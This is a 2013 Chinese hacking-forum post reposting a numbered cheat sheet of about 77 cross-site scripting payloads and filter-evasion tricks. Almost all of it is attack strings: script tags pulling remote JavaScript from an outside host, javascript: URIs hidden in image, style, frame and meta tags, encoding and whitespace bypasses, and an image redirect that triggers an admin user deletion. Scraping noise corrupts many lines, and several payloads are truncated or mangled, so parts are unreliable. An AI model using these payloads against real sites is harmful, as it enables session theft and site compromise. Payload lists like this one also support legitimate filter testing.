找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2873|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 q1 f2 _0 Y3 t( K9 S(1)普通的XSS JavaScript注入
% ]9 t; H* g, ^1 L: Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 n+ b9 Q% Z7 `  w8 b$ l(2)IMG标签XSS使用JavaScript命令
( l0 S; \8 p) l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! D+ |/ Q* G2 v* n' r, c6 l
(3)IMG标签无分号无引号# f0 h6 M7 M0 ^( a9 a! ^
<IMG SRC=javascript:alert(‘XSS’)>3 \- y2 k" s/ N6 X
(4)IMG标签大小写不敏感
- m3 q0 k0 ?- d) z" j<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& D) @7 t- Q5 h(5)HTML编码(必须有分号)
. m3 ]; W) u( n2 P<IMG SRC=javascript:alert(“XSS”)>/ s$ i3 B7 \0 W- d7 {- T+ ~7 d
(6)修正缺陷IMG标签# S  E9 C' D( t7 b1 ~0 H
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. [  _0 i  g; q8 v8 k0 Y

' N# h8 a5 p) C) E7 s1 z* [9 k2 }1 n$ J3 |( A' H' p0 S
(7)formCharCode标签(计算器)
- b- ?" y/ o# S  D<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 i. T- s( ~5 I- {5 l( H( Q) z
(8)UTF-8的Unicode编码(计算器)
: L: t2 W# e; n- t  `7 E- @<IMG SRC=jav..省略..S')>
5 j+ a7 c  k6 s; C$ R( N) |(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 g1 I+ E5 ^- t# g, v<IMG SRC=jav..省略..S')># t$ P- p  d/ n: m7 U
(10)十六进制编码也是没有分号(计算器)
7 X2 c2 b/ x; ]+ V+ A<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>. k3 V, B! T' H( {7 a4 X
(11)嵌入式标签,将Javascript分开& P7 y# t* Y/ H  N/ }: s7 Q6 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* [8 V# l) I) j( n' o5 r! J( `(12)嵌入式编码标签,将Javascript分开  j5 m2 ]! c  _8 J1 l# @
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 s9 |: c# \  u; o4 k; ]+ |, A- n4 f(13)嵌入式换行符
, f6 n/ g+ X* B( z1 M<IMG SRC=”jav ascript:alert(‘XSS’);”>$ }- ^* `( S  J: P3 S- Z
(14)嵌入式回车
9 S  }7 x* t  n9 U: _; ~" z<IMG SRC=”jav ascript:alert(‘XSS’);”>, q+ K+ I# l' X, |' h' H$ [
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 m& E- i4 ?/ h6 M! Y: ?; b
<IMG SRC=”javascript:alert(‘XSS‘)”>( n8 @, M9 z% B2 O6 ?. S& N
(16)解决限制字符(要求同页面)
# W/ l; b9 J+ w- l: N% M<script>z=’document.’</script>
$ H0 {. ~0 I- o% X2 l$ C<script>z=z+’write(“‘</script>, d9 n. v5 H& L) _. \# Z* p+ w
<script>z=z+’<script’</script>
( c% w. C2 m9 \0 M<script>z=z+’ src=ht’</script>+ |7 t  Y" I' q- A" }
<script>z=z+’tp://ww’</script>
% L- @1 `8 I: m& l7 C) l<script>z=z+’w.shell’</script>
* o  Q, b# k* }, m6 u<script>z=z+’.net/1.’</script>
1 O  h% N# Y' G% j  q<script>z=z+’js></sc’</script>
/ P# z) M2 x7 ]! O! z: l<script>z=z+’ript>”)’</script>
# D+ B1 i1 |9 w8 `5 ?! Z<script>eval_r(z)</script>
/ B: G3 ~; `3 x" ]0 d: D(17)空字符12-7-1 T00LS - Powered by Discuz! Board
7 J2 A5 D2 c7 a7 B: F; ihttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
1 F4 S3 D( x8 K: f3 N! b2 z: P: lperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. ?7 @. B5 F2 L9 t
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! W. m1 O2 ]) _2 K; H  m* D: e) ?, l+ Bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  F# B5 D  `: M! h" _( o(19)Spaces和meta前的IMG标签
3 T& `8 D( s- y$ D9 v+ U! m<IMG SRC=” javascript:alert(‘XSS’);”>
# T! v: |  ]$ T; J7 z: P1 \# N5 L(20)Non-alpha-non-digit XSS, i' [. o4 Y: N7 l2 B
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ ~- Q7 E, d0 g  x+ ]4 \
(21)Non-alpha-non-digit XSS to 2
- ^# V8 ]4 w" ]8 x7 P1 V<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 x  H9 A0 b: p
(22)Non-alpha-non-digit XSS to 3
$ P3 t$ k" _9 c5 X. ?$ g1 U<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 i* K6 `' Y1 @9 b6 y9 C1 X(23)双开括号: J$ ?3 A$ y8 {2 I% P3 o3 s9 A8 \
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. D7 n% j5 m, x2 R- T9 D(24)无结束脚本标记(仅火狐等浏览器)# C2 ?3 J, M4 u; h. D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( M, y+ ^) u. R/ R+ W(25)无结束脚本标记2
: G8 ]7 ]0 p2 m! R4 @: U. z<SCRIPT SRC=//3w.org/XSS/xss.js>
% D- Q" V; X  v! g(26)半开的HTML/JavaScript XSS& n0 O( H4 M$ T6 f: V& Q
<IMG SRC=”javascript:alert(‘XSS’)”3 {, F; q2 _8 f0 N& a, M
(27)双开角括号
# ~! z/ j' W) g<iframe src=http://3w.org/XSS.html <
, I. J5 H' z7 X. Y(28)无单引号 双引号 分号9 |' k! H$ \4 K
<SCRIPT>a=/XSS/4 _+ [) e4 `' y, N1 ]2 M9 J
alert(a.source)</SCRIPT>
1 R8 c+ e& u. U/ g% M(29)换码过滤的JavaScript
: A  Q5 h$ L' z, g5 n5 _\”;alert(‘XSS’);//+ z; u5 p. s1 N! W6 w1 {' p5 D3 ^
(30)结束Title标签
8 z& Q( U4 n6 \</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' |# o; c4 h7 J: m( R
(31)Input Image
8 K9 K7 ^4 a$ g<INPUT SRC=”javascript:alert(‘XSS’);”>
& I2 C5 U  d9 P7 `- s0 e2 G(32)BODY Image
2 v. S$ i# Q# [+ e<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 E% X& a$ e- S6 J* ^
(33)BODY标签
) g' N) q) p, |& _" J! e& y3 k<BODY(‘XSS’)>
2 R' c9 ?' {" {7 `* p(34)IMG Dynsrc
- U& R1 V; S% r2 z5 A<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 g: ^6 _/ R9 U3 U2 F+ n. s(35)IMG Lowsrc
$ }; y( @5 ^1 }; N+ O0 I' E<IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 d! K/ S( v0 a0 n( c(36)BGSOUND
  o/ p1 L9 M  a; m8 o<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 ^4 v3 b- O. c; {* Y/ c: Q$ P3 \
(37)STYLE sheet
, k* [' c8 t- ^: ~1 g2 p<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 U  e. h) ^4 A7 d  F
(38)远程样式表5 W% ?) A# |. t5 n( I
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: G% G9 C- ?" J0 J, ^
(39)List-style-image(列表式)
1 J4 q- [+ Q4 @- J6 ]% o7 t<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 r% d5 U/ A0 p+ u) M3 o( R- T
(40)IMG VBscript
( p) e4 J) s+ r5 B8 j5 J2 ]+ N5 l<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS4 P5 }  x" T2 Z5 e% a4 X: b
(41)META链接url
* L* _7 D7 o. x! I5 c  n9 h) N" }
" m( H7 M2 T- v: ]4 c3 d
0 D9 j# Z2 X4 d( ^) Z& W<META HTTP-EQUIV=”refresh” CONTENT=”0;
7 y; w4 h6 \# xURL=http://;URL=javascript:alert(‘XSS’);”>( l+ E( A4 N. ~/ o, v. b
(42)Iframe
1 a' z+ i  A( o* M/ H6 P<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. ^& n1 t* q5 ^, p: z
(43)Frame$ X) H- ?1 A0 J9 `9 d
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board* X; X0 d; C9 ]5 z9 ]/ O
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
9 }5 p, d+ S. J" x# {  F  q2 n+ n(44)Table
. f$ f. S8 C# q" U- x$ r7 N<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, D: n: H% O& e; J& W  k% I
(45)TD1 K, e" l+ Q6 n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ R' M7 Q4 N  C5 P* M
(46)DIV background-image' u& k1 I' v9 e4 v* B$ F4 E2 \1 o
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! e& U- i5 A9 _% Z7 f: h1 {) m0 {2 U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-6 G! v4 o- `, R+ i
8&13&12288&65279): @0 \, T6 w9 P; D! C: p  m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" k, |& _# z& I8 j(48)DIV expression
' m4 ], ]9 I6 ^/ I- G4 I1 y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ Z. C6 p$ z- ?" F; Z& P$ ~(49)STYLE属性分拆表达
$ w, N; T2 @. U<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) |) M* R* N7 a% @5 W0 a(50)匿名STYLE(组成:开角号和一个字母开头)/ A/ ~8 S/ l) }# z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
  ~2 k( v( L! \  M/ @' z  b+ D(51)STYLE background-image: r: {# ^% _* L1 l
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
% C: ~5 v7 R2 VCLASS=XSS></A># y( Z2 i. a$ B
(52)IMG STYLE方式
4 P: z( q8 m  t  m5 l8 W8 @8 Bexppression(alert(“XSS”))’>( _5 X% x- C. H! i8 k
(53)STYLE background3 e. B3 S8 I3 M9 c! s$ n/ H9 C
<STYLE><STYLE
- H8 w  N  k1 `5 R# etype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>& K! U  O4 i; Z+ S" r' W/ r$ I! \
(54)BASE8 B" @' O9 r) `# R
<BASE HREF=”javascript:alert(‘XSS’);//”>
- V! E6 g* S4 B* W1 d! D9 G(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
6 H3 N3 x  n& ~, N- V8 [) U<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
3 F: G; a/ q, M; f; m# S: j(56)在flash中使用ActionScrpt可以混进你XSS的代码: O* D9 \  j" F; M3 V" G
a=”get”;
4 f4 ^1 T6 n! x' ~, o% w1 Y0 f. xb=”URL(\”";
4 w1 n- X3 G$ J2 b, k- lc=”javascript:”;; x- r0 x. \6 K2 c. p
d=”alert(‘XSS’);\”)”;2 Z' @1 j# ]9 g% m2 @
eval_r(a+b+c+d);
) R; E; t0 B: ~) C(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. t4 L0 L2 `: p
<HTML xmlns:xss>
* i4 n; {1 Q8 z: G% E: f<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># d1 n; U6 _: y2 f2 B  M6 H
<xss:xss>XSS</xss:xss>
  d* y4 m0 o8 h</HTML>2 ]; v. @" a2 L% D8 n" M2 E* m
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. L; H# P7 l1 |6 s+ I" }: e<SCRIPT SRC=””></SCRIPT>8 g  A# _! b6 `
(59)IMG嵌入式命令,可执行任意命令! c$ \& `; z3 A& G6 l0 O
<IMG SRC=”http://www.XXX.com/a.php?a=b”>* S# M/ B  D- N* }! g2 m* _
(60)IMG嵌入式命令(a.jpg在同服务器)
6 R; |5 r) i' y9 F& ^4 yRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 N- ^$ I( h$ w
(61)绕符号过滤1 X# }& ^: T- `" H8 P& \
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>+ f$ T  i7 [) X, u: ?$ Q
(62), H" `( a/ q0 U9 H$ ~
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! F+ ^2 X* e  G(63)
6 @/ n  L5 m" f0 K. Z' v+ f  A( q<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
; c2 b1 y+ [% G4 Q(64)
8 t( R& `/ o8 A) E& p<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. R; @& _6 G$ J$ y9 k$ }) Q5 ]; q(65)
  m( O' ?! d  J. ^: `9 N% [8 a: I/ g<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ y; @1 ^$ l  q4 S" r  @5 j
(66)12-7-1 T00LS - Powered by Discuz! Board  x" Q3 U; j3 q  ?, Q: a3 Y- G
https://www.t00ls.net/viewthread ... table&tid=15267 4/69 h- Z. H+ p; q
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
  M' E; ]' B# s& _5 {& N, D# t4 U(67)- K, i  n) A3 x
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>' v5 p* f" i8 Y! V4 K4 S0 R. e
</SCRIPT>
4 E/ h. D$ ?8 e. w" d6 f+ Z1 y(68)URL绕行$ N( Z3 z! y6 W* ^! [. w1 E
<A HREF=”http://127.0.0.1/”>XSS</A>
7 W' X, E9 T0 g" a" b# E(69)URL编码
. J0 A7 X9 W- n<A HREF=”http://3w.org”>XSS</A>
3 N, L* a3 R2 F. E6 O9 |, m(70)IP十进制7 l8 [+ B+ ?! X9 |# }! @  u- S
<A HREF=”http://3232235521″>XSS</A>4 h! U2 J, ~* g; P
(71)IP十六进制
. ~/ z, `) m" }8 h<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
9 e! f4 v. E& S9 M: X4 X4 @(72)IP八进制) g/ {  i/ x  A
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 @' y8 G  W1 M/ H/ u- W, M$ G) r(73)混合编码1 H" l5 |) ?* g- S" R+ \/ {! D! r
<A HREF=”h" @( Y: a( i/ x0 Y% W. b4 o& T+ k
tt p://6 6.000146.0×7.147/”">XSS</A>. T+ R" U9 }, [/ S5 o
(74)节省[http:]
8 ]3 ^) S, E8 S<A HREF=”//www.google.com/”>XSS</A>3 P7 P6 R! I) z3 {! z& g, a6 ~9 I  U
(75)节省[www]1 z" a! O3 d$ s9 M: w
<A HREF=”http://google.com/”>XSS</A>7 i6 \# k9 R) p4 D( H
(76)绝对点绝对DNS* b% X- A4 P) O1 x
<A HREF=”http://www.google.com./”>XSS</A>+ F( D2 R7 d& Z6 l1 ]% D
(77)javascript链接4 W  X* A' o7 J6 }( M- Z( a
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>  K' c1 @; ]- K$ o7 X
4 P! K% y$ \, \. i# a( c+ l
原文地址:http://fuzzexp.org/u/0day/?p=14
1 z9 @6 A1 b7 m$ Y" `; [5 a% ~3 H' f; z' n/ |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表